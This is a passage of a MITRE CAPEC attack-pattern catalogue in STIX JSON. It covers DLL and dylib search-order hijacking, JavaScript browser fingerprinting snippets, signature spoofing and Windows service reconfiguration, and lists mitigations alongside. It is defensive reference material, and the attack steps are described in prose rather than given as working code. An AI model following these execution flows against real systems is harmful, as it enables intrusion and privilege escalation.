ntshrui.dll from the System32 folder will actually load the DLL supplied by the attacker simply because of the preferential search order. Since the attacker has placed its malicious ntshrui.dll in the same directory as the loading explorer.exe process, the DLL supplied by the attacker will be found first and thus loaded in lieu of the legitimate DLL. Since explorer.exe is loaded during the boot cycle, the attackers' malware is guaranteed to execute.", + "macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence. A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target general susceptibility: An attacker uses an automated tool or manually finds whether the target application uses dynamically linked libraries and the configuration file or look up table (such as Procedure Linkage Table) which contains the entries for dynamically linked libraries.

    2. Techniques
    The attacker uses a tool such as the OSX \"otool\" utility or manually probes whether the target application uses dynamically linked libraries.
    The attacker finds the configuration files containing the entries to the dynamically linked libraries and modifies the entries to point to the malicious libraries the attacker crafted.

Experiment

  1. Craft malicious libraries: The attacker uses knowledge gained in the Explore phase to craft malicious libraries that they will redirect the target to leverage. These malicious libraries could have the same APIs as the legitimate library and additional malicious code.

    2. Techniques
    The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using \"sleep(2)\" and \"usleep()\" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.

Exploit

  1. Redirect the access to libraries to the malicious libraries: The attacker redirects the target to the malicious libraries they crafted in the Experiment phase. The attacker will be able to force the targeted application to execute arbitrary code when the application attempts to access the legitimate libraries.

    2. Techniques
    The attacker modifies the entries in the configuration files pointing to the malicious libraries they crafted.
    The attacker leverages symlink/timing issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-132.
    The attacker leverages file search path order issues to redirect the target to access the malicious libraries they crafted. See also: CAPEC-38.
", + "x_capec_prerequisites": [ + "Attacker has a mechanism to place its malicious libraries in the needed location on the file system." + ], + "x_capec_skills_required": { + "Medium": "Ability to create a malicious library." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Fix the Windows loading process to eliminate the preferential search order by looking for DLLs in the precise location where they are expected", + "id": "course-of-action--8ffe2b80-32e7-45af-ae49-9acc5644e178", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-471-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2809e228-142a-488a-a2f7-22b0bdda15e1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ffe2b80-32e7-45af-ae49-9acc5644e178", + "target_ref": "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Sign system DLLs so that unauthorized DLLs can be detected.", + "id": "course-of-action--92e64bf4-2169-4c6e-85ec-d018c8dd9146", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-471-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--189e08be-aa2a-4fe1-9544-7d387f8d6fd4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--92e64bf4-2169-4c6e-85ec-d018c8dd9146", + "target_ref": "attack-pattern--abdd46ce-dd2d-4430-8032-aa3ee1d262fd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.", + "external_references": [ + { + "external_id": "CAPEC-472", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/472.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Gareth Heyes, Detecting browsers javascript hacks, The Spanner, 2009--01---29", + "external_id": "REF-410", + "source_name": "reference_from_CAPEC", + "url": "http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/" + } + ], + "id": "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Browser Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The following code snippets can be used to detect various browsers:\n \n Firefox 2/3\n FF=/a/[-1]=='a'\n Firefox 3\n FF3=(function x(){})[-5]=='x'\n Firefox 2\n FF2=(function x(){})[-6]=='x'\n IE\n IE='\\v'=='v'\n Safari\n Saf=/a/.__proto__=='//'\n Chrome\n Chr=/source/.test((/a/.toString+''))\n Opera\n Op=/^function \\(/.test([].sort)\n \n " + ], + "x_capec_prerequisites": [ + "Victim's browser visits a website that contains attacker's Java ScriptJava Script is not disabled in the victim's browser" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable Java Script in the browser", + "id": "course-of-action--4f6e0e7b-25c7-423b-bb3e-a652a1fe9285", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-472-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11ed3172-e4ba-44b6-90f3-93e92247d779", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f6e0e7b-25c7-423b-bb3e-a652a1fe9285", + "target_ref": "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.", + "external_references": [ + { + "external_id": "CAPEC-473", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/473.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Masquerading: Invalid Code Signature", + "external_id": "T1036.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/001" + }, + { + "description": "Subvert Trust Controls: Code Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + } + ], + "id": "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker provides a victim with a malicious executable disguised as a legitimate executable from an established software by signing the executable with a forged cryptographic key. The victim's operating system attempts to verify the executable by checking the signature, the signature is considered valid, and the attackers' malicious executable runs.", + "An attacker exploits weaknesses in a cryptographic algorithm to that allow a private key for a legitimate software vendor to be reconstructed, attacker-created malicious software is cryptographically signed with the reconstructed key, and is installed by the victim operating system disguised as a legitimate software update from the software vendor." + ], + "x_capec_parent_of_refs": [ + "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55", + "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "attack-pattern--a35eb10e-1168-4c77-8f46-87fa6ee40ef7", + "attack-pattern--5b01885b-ebb8-4b72-8314-6fb4729eda47" + ], + "x_capec_prerequisites": [ + "The victim or victim system is dependent upon a cryptographic signature-based verification system for validation of one or more security events or actions.", + "The validation can be bypassed via an attacker-provided signature that makes it appear that the legitimate authoritative or reputable source provided the signature." + ], + "x_capec_skills_required": { + "High": "Technical understanding of how signature verification algorithms work with data and applications" + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker obtains an authoritative or reputable signer's private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.", + "external_references": [ + { + "external_id": "CAPEC-474", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/474.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "description": "Unsecured Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + }, + { + "description": "Sigbjørn Vik, Security breach stopped, 2013--06---26, http://my.opera.com/securitygroup/blog/2013/06/26/opera-infrastructure-attack", + "external_id": "REF-411", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Patrick Morley, Bit9 and Our Customers’ Security, 2013--02---08, https://blog.bit9.com/2013/02/08/bit9-and-our-customers-security/", + "external_id": "REF-412", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Brad Arkin, Inappropriate Use of Adobe Code Signing Certificate, 2012--09---27, http://blogs.adobe.com/asset/2012/09/inappropriate-use-of-adobe-code-signing-certificate.html", + "external_id": "REF-413", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoofing by Key Theft", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An authoritative or reputable signer is storing their private signature key with insufficient protection." + ], + "x_capec_skills_required": { + "High": "Ability to compromise systems containing sensitive data", + "Low": "Knowledge of common location methods and access methods to sensitive data" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Restrict access to private keys from non-supervisory accounts", + "id": "course-of-action--1a764dd5-94bd-4c75-bef3-01a623dd0d4a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ed7f5dd6-f7d2-404c-b096-c1b77aec68be", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1a764dd5-94bd-4c75-bef3-01a623dd0d4a", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Restrict access to administrative personnel and processes only", + "id": "course-of-action--ecc460e4-3af3-4082-8906-0c1f6892992f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--af927d47-9f4f-4c35-abe7-1b27e76baf07", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ecc460e4-3af3-4082-8906-0c1f6892992f", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all remote methods are secured", + "id": "course-of-action--4997aedd-dbf7-4903-a4e1-1037632690b8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d744a39d-65e1-4dc4-800a-54487a665643", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4997aedd-dbf7-4903-a4e1-1037632690b8", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all services are patched and up to date", + "id": "course-of-action--500e5e72-3b87-4258-b3e5-53fce6b4b801", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-474-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3605759e-9ca2-443d-901d-741c0c2033c6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--500e5e72-3b87-4258-b3e5-53fce6b4b801", + "target_ref": "attack-pattern--a9d3765f-d7af-4ba2-9396-007d9942240f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.", + "external_references": [ + { + "external_id": "CAPEC-475", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/475.html" + }, + { + "external_id": "CWE-347", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/347.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-295", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/295.html" + }, + { + "description": "Kenn White, Microsoft's Chain of Fools, 2020--01---15, First Principles", + "external_id": "REF-562", + "source_name": "reference_from_CAPEC", + "url": "https://blog.lessonslearned.org/chain-of-fools/" + }, + { + "description": "Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers, 2020--01---14, National Security Agency (NSA)", + "external_id": "REF-563", + "source_name": "reference_from_CAPEC", + "url": "https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF" + }, + { + "description": "Thomas Ptacek, Thomas Pornin, Analysis of REF-563, Hacker News", + "external_id": "REF-564", + "source_name": "reference_from_CAPEC", + "url": "https://news.ycombinator.com/item?id=22048619" + } + ], + "id": "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Signature Spoofing by Improper Validation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The Windows CryptoAPI (Crypt32.dll) was shown to be vulnerable to signature spoofing by failing to properly validate Elliptic Curve Cryptography (ECC) certificates. If the CryptoAPI's signature validator allows the specification of a nonstandard base point (G): \"An adversary can create a custom ECDSA certificate with an elliptic curve (ECC) signature that appears to match a known standard curve, like P-256 that includes a public key for an existing known trusted certificate authority, but which was in fact not signed by that certificate authority. Windows checks the public key and other curve parameters, but not the (bespoke adversary-supplied) base point generator (G) parameter constant which actually generated the curve\" [REF-562]. Exploiting this vulnerability allows the adversary to leverage a spoofed certificate to dupe trusted network connections and deliver/execute malicious code, while appearing as legitimately trusted entity [REF-563]. This ultimately tricks the victim into believing the malicious website or executable is legitimate and originates from a properly verified source. See also: CVE-2020-0601" + ], + "x_capec_extended_description": "\n Signature verification algorithms are generally used to determine whether a certificate or piece of code (e.g. executable, binary, etc.) possesses a valid signature and can be trusted.\n If the leveraged algorithm confirms that a valid signature exists, it establishes a foundation of trust that is further conveyed to the end-user when interacting with a website or application. However, if the signature verification algorithm improperly validates the signature, either by not validating the signature at all or by failing to fully validate the signature, it could result in an adversary generating a spoofed signature and being classified as a legitimate entity. Successfully exploiting such a weakness could further allow the adversary to reroute users to malicious sites, steals files, activates microphones, records keystrokes and passwords, wipes disks, installs malware, and more.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Recipient is using a weak cryptographic signature verification algorithm or a weak implementation of a cryptographic signature verification algorithm, or the configuration of the recipient's application accepts the use of keys generated using cryptographically weak signature verification algorithms." + ], + "x_capec_skills_required": { + "High": "Reverse engineering and cryptanalysis of signature verification algorithm implementation" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use programs and products that contain cryptographic elements that have been thoroughly tested for flaws in the signature verification routines.", + "id": "course-of-action--c68612c7-a3bf-4a0e-8416-0cc58982766d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-475-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca2272d5-9269-4fa1-9964-f2d6d45c271c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c68612c7-a3bf-4a0e-8416-0cc58982766d", + "target_ref": "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in the parsing or display code of the recipient software to generate a data blob containing a supposedly valid signature, but the signer's identity is falsely represented, which can lead to the attacker manipulating the recipient software or its victim user to perform compromising actions.", + "external_references": [ + { + "external_id": "CAPEC-476", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/476.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Eric Johanson, The state of homograph attacks, 2005--02---11, http://www.shmoo.com/idn/homograph.txt", + "external_id": "REF-414", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Signature Spoofing by Misrepresentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Recipient is using signature verification software that does not clearly indicate potential homographs in the signer identity.Recipient is using signature verification software that contains a parsing vulnerability, or allows control characters in the signer identity field, such that a signature is mistakenly displayed as valid and from a known or authoritative signer." + ], + "x_capec_skills_required": { + "High": "Attacker may be required to create malformed data blobs and know how to insert them in a location that the recipient will visit." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the application is using parsing and data display techniques that will accurately display control characters, international symbols and markings, and ultimately recognize potential homograph attacks.", + "id": "course-of-action--694ab70c-12fd-45fd-8fa9-0806c5da0396", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-476-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--82379432-2b82-4aca-a835-238f54a057ef", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--694ab70c-12fd-45fd-8fa9-0806c5da0396", + "target_ref": "attack-pattern--72a45548-61df-47c1-a7a0-12e07ec71f37", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data.", + "external_references": [ + { + "external_id": "CAPEC-477", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/477.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + } + ], + "id": "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Signature Spoofing by Mixing Signed and Unsigned Content", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Signer and recipient are using complex data storage structures that allow for a mix between signed and unsigned data", + "Recipient is using signature verification software that does not maintain separation between signed and unsigned data once the signature has been verified." + ], + "x_capec_skills_required": { + "High": "Attacker must be able to create malformed data blobs and know how to insert them in a location that the recipient will visit." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the application is fully patched and does not allow the processing of unsigned data as if it is signed data.", + "id": "course-of-action--f9df8e0c-94b6-4847-ad19-ece4cc20afe0", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-477-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6679a0b9-deee-47e3-81d3-9d55d39d9207", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f9df8e0c-94b6-4847-ad19-ece4cc20afe0", + "target_ref": "attack-pattern--929e7d9a-b34c-43ad-b58b-b8df918c4f62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2018-04-25T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. The goal of this attack is to execute a malicious binary in place of an existing service.", + "external_references": [ + { + "external_id": "CAPEC-478", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/478.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Hijack Execution Flow:Service Registry Permissions Weakness", + "external_id": "T1574.011", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/011" + }, + { + "description": "Create or Modify System Process:Windows Service", + "external_id": "T1543.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543/003" + } + ], + "id": "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Modification of Windows Service Configuration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands (By altering specific configuration settings for the service, the adversary could run arbitrary code to be executed.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target system: The adversary must first determine the system they wish to modify the registry of. This needs to be a windows machine as this attack only works on the windows registry.

Experiment

  1. Gain access to the system: The adversary needs to gain access to the system in some way so that they can modify the windows registry.

    2. Techniques
    Gain physical access to a system either through shoulder surfing a password or accessing a system that is left unlocked.
    Gain remote access to a system through a variety of means.

Exploit

  1. Modify windows registry: The adversary will modify the windows registry by changing the configuration settings for a service. Specifically, the adversary will change the path settings to define a path to a malicious binary to be executed.

